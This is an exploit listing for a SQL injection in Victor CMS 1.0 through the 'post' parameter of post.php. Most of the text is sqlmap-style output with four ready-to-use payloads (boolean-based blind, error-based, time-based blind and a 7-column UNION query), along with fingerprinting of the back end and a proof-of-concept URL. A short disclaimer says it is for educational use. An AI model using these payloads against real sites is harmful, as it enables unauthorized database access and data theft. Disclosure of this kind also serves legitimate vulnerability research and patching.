Victor cms 1.0 post sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-05-11 |
Type : webapps |
Platform : php
This exploit / vulnerability Victor cms 1.0 post sql injection is for educational purposes only and if it is used you will do on your own risk!
# Discription:
# The Victor CMS v1.0 application is vulnerable to SQL injection via the 'post' parameter on the post.php page.
# vulnerable file : post.php
http://localhost/CMSsite-master/post.php?post=1
Parameter: post (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: post=1 AND 2333=2333
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: post=1 AND (SELECT 4641 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4641=4641,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: post=1 AND (SELECT 7147 FROM (SELECT(SLEEP(5)))vltp)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: post=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL-- PTYU
[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache 2.4.39, PHP 7.2.18
back-end DBMS: MySQL >= 5.0
# Proof of Concept:
http://localhost/CMSsite-master/post.php?post=sqli